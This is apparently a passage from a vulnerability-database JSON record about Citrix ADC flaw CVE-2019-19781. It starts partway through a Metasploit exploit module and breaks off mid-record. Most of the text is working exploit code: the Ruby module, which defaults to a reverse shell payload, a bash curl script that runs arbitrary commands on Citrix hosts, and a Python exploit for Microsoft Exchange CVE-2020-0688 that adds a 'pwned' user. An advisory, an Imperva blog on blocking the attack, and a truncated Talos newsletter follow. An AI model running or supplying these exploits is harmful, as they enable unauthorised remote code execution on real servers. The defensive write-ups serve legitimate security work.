Execution',\n 'Description' => %q(\n An issue was discovered in Citrix Application Delivery Controller (ADC)\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n ),\n 'Author' => [\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['EDB', '47901'],\n ['EDB', '47902']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl meterpreter'\n }\n },\n 'Targets' => [\n ['Unix (remote shell)',\n 'Type' => :cmd_shell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\n 'DisablePayloadHandler' => 'false'\n }\n ],\n ['Unix (command-line)',\n 'Type' => :cmd_generic,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptAddress.new('RHOST', [true, 'The target address'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('RHOSTS')\n end\n\n def execute_command(command, opts = {})\n filename = Rex::Text.rand_text_alpha(16)\n nonce = Rex::Text.rand_text_alpha(6)\n\n request = {\n 'method' => 'POST',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\n 'headers' => {\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => 'http://127.0.0.1',\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\n 'desc' => 'desc',\n 'UI_inuse' => 'RfWeb'\n },\n 'encode_params' => false\n }\n\n begin\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n\n if received.code == 200\n vprint_status(\"#{received.get_html_document.text}\")\n sleep 2\n\n request = {\n 'method' => 'GET',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\n 'headers' => {\n 'NSC_USER' => nonce,\n 'NSC_NONCE' => nonce\n }\n }\n\n ## Trigger to gain exploitation.\n begin\n send_request_cgi(request)\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n return received\n end\n\n return false\n end\n\n def get_chr_payload(command)\n chr_payload = command\n i = chr_payload.length\n\n output = \"\"\n chr_payload.each_char do | c |\n i = i - 1\n output << \"chr(\" << c.ord.to_s << \")\"\n if i != 0\n output << \" . \"\n end\n end\n\n return output\n end\n\n def check\n begin\n received = send_request_cgi(\n \"method\" => \"GET\",\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\n )\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n\n if received && received.code != 200\n return Exploit::CheckCode::Safe\n end\n return Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n unless check.eql? Exploit::CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n else\n print_good('The target appears to be vulnerable.')\n end\n\n case target['Type']\n when :cmd_generic\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n received = execute_command(payload.encoded)\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\n print_warning('Dumping command output in parsed http response')\n print_good(\"#{received.get_html_document.text}\")\n else\n print_warning('Empty response, no command output')\n return\n end\n\n when :cmd_shell\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n execute_command(payload.encoded)\n end\n end\n\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "href": "", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "type": "exploitpack", "sourceData": "#!/bin/bash\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\n# Release Date : 11/01/2020\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\necho \"=================================================================================\n ___ _ _ ____ ___ _ _\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\n |__/ CVE-2019-19781\n=================================================================================\"\n##############################\nif [ -z \"$1\" ];\nthen\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\nexit;\nfi\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\necho -ne \"Command Output :\\n\"\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:40:18", "bulletinFamily": "exploit", "description": "\nMicrosoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "modified": "2020-03-02T00:00:00", "published": "2020-03-02T00:00:00", "id": "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "href": "", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "type": "exploitpack", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\n# Date: 2020-02-28\n# Exploit Author: Photubias\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\n# Vendor Homepage: https://www.microsoft.com\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\n# CVE: CVE-2020-0688\n\n#! /usr/bin/env python\n# -*- coding: utf-8 -*- \n''' \n\n \n\tCopyright 2020 Photubias(c)\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see <http://www.gnu.org/licenses/>.\n \n File name CVE-2020-0688-Photubias.py\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\n\n This is a native implementation without requirements, written in Python 2.\n Works equally well on Windows as Linux (as MacOS, probably ;-)\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\n\n Example Output:\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\n [+] Login worked\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\n [+] Detected OWA version number 15.2.221.12\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\n [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==\n Sending now ...\n'''\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\n\n## STATIC STRINGS\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\n\ndef convertInt(iInput, length): \n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\n\ndef getYsoserialPayload(sCommand, sSessionId):\n ## PART1 of the payload to hash\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\n ## Fix the length fields\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\n strLength2 = convertInt(0x04da + len(sCommand),4)\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\n \n ## PART2 of the payload to hash\n strPart2 = '274e7bb9'\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\n strPart2 = binascii.unhexlify(strPart2)\n \n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\n return strResult\n\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\n if not sTarget[-1:] == '/': sTarget += '/'\n ## Verify Login\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\n except: print('[!] Error, ' + sTarget + ' not reachable')\n bLoggedIn = False\n for cookie in oCookjar:\n if cookie.name == 'cadata': bLoggedIn = True\n if not bLoggedIn:\n print('[-] Login Wrong, too bad')\n exit(1)\n print('[+] Login worked')\n\n ## Verify Session ID\n sSessionId = ''\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\n for cookie in oCookjar:\n if 'SessionId' in cookie.name: sSessionId = cookie.value\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\n\n ## Verify OWA Version\n sVersion = ''\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\n except: sVersion = 'favicon'\n if 'favicon' in sVersion:\n print('[*] Problem, this user has never logged in before (wizard detected)')\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\n exit(1)\n print('[+] Detected OWA version number '+sVersion)\n\n ## Verify ViewStateValue\n sViewState = ''\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\n except: pass\n if sViewState == 'B97B4E27':\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\n else:\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\n if ans == '' or ans.lower() == 'n': exit(1)\n return sSessionId, sTarget, sViewState\n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\n parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\n args = parser.parse_args()\n if args.target == '' or args.username == '' or args.command == '':\n print('[!] Example usage: ')\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\n else:\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\n else: sPassword = args.password\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n oCookjar = cookielib.CookieJar()\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')\n if ans.lower() == 'n': exit(0)\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\n print('[+] Got Payload: ' + sPayLoad)\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\n print(' Sending now ...')\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\n except urllib2.HTTPError, e:\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\n\nif __name__ == \"__main__\":\n\tmain()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2020-01-14T18:24:32", "bulletinFamily": "unix", "description": "\nArt Manion and Will Dormann report:\n\n\n\t By using an older and less-secure form of open(), it is\n\t possible for untrusted template files to cause reads/writes\n\t outside of the template directories. This vulnerability is\n\t a component of the recent Citrix exploit.\n\t \n\n", "modified": "2019-12-13T00:00:00", "published": "2019-12-13T00:00:00", "id": "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "href": "https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html", "title": "Template::Toolkit -- Directory traversal on write", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2020-01-19T15:26:21", "bulletinFamily": "blog", "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writeable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of various clients that were identified based on client verification tests, as sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - this was identified by cURL User-Agent as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the amount of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked: \n\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2020-01-19T15:00:50", "published": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2020-01-30T19:31:49", "bulletinFamily": "blog", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nBe sure to pay close attention Tuesday for [some changes we have coming to Snort.org](<https://blog.snort.org/2020/01/area-under-construction-snort.html>). We\u2019ll spare you the details for now, but please bear with us if the search function isn\u2019t working correctly for you or you see anything else wonky on the site. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0117-0124.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **A World of Threats: When DNS becomes the new weapon for governments at [Swiss Cyber Security Days](<https://swisscybersecuritydays.ch/en/programme-en/>)** ** \n**Location: **Forum Fribourg, Granges-Paccot, Switzerland \n**Date: **Feb. 12 - 13 \n**Speakers: **Paul Rascagn\u00e8res \n**Synopsis: **In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named \u201cSea Turtle.\u201d This actor is more advanced and more aggressive than others we\u2019ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims. \n \n\n\n### Cyber Security Week in Review\n\n * State-sponsored actors linked to Turkey are believed to be [behind a recent wave of cyber attacks](<https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X>) targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. \n * Facebook executives backed the security of its WhatsApp messaging software, saying it [could not have been at fault](<https://www.inc.com/jason-aten/facebook-says-apple-is-to-blame-for-hacking-of-jeff-bezos-phone.html>) for the hacking of Amazon CEO Jeff Bezos\u2019 phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS\u2019 security. \n * The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for [private assistance with security](<https://www.ft.com/content/96c79040-40ea-11ea-bdb5-169ba7be433d>). For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. \n * Dozens of United Nations servers and user accounts were [breached during an August cyber attack](<https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack>), according to new leaked reports. Staff members working in the UN\u2019s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. \n * The Japanese government [adopted a series of new policies](<https://www.infosecurity-magazine.com/news/japan-considers-emergency/>) this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. \n * Cisco [launched a new security architecture platform for IoT devices](<https://securityboulevard.com/2020/01/cisco-launches-iot-security-platform/>) this week. Cisco Cyber Vision provides users with software and services backed by Talos\u2019 intelligence to identify threats and vulnerabilities in IoT assets in real-time. \n * Facebook [agreed to pay $550 million](<https://techcrunch.com/2020/01/29/facebook-will-pay-550-million-to-settle-class-action-lawsuit-over-privacy-violations/>) as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. \n * The actor behind the Maze ransomware [dumped a large amount of victim data online](<https://arstechnica.com/information-technology/2020/01/dozens-of-companies-have-data-dumped-online-by-ransomware-ring-seeking-leverage/>) this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze\u2019s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. \n * The [latest security update to iOS](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. \n\n \n\n\n### Notable recent security issues\n\n**Title: **[Cisco urging users to update Firepower Management Center immediately to fix severe bug](<https://www.zdnet.com/article/cisco-patch-this-critical-firewall-bug-in-firepower-management-center/>) \n**Description: **Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability \u2014 which was assigned a 9.8 severity score out of 10 \u2014 exists in the way Firepower handles LDAP authentication responses from an external authentication server. An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager. \n**Snort SIDs: **52627 \u2013 52632, 52641 - 52646 \n** \n****Title: **[Exploitation of Citrix vulnerability spikes after POC released, patches followed](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \n**Description: **Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline. \n**Snort SIDs: **52620 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5: **8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** eternalblue-2.2.0.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.85B936960F.5A5226262.auto.Talos \n \n**SHA 256: 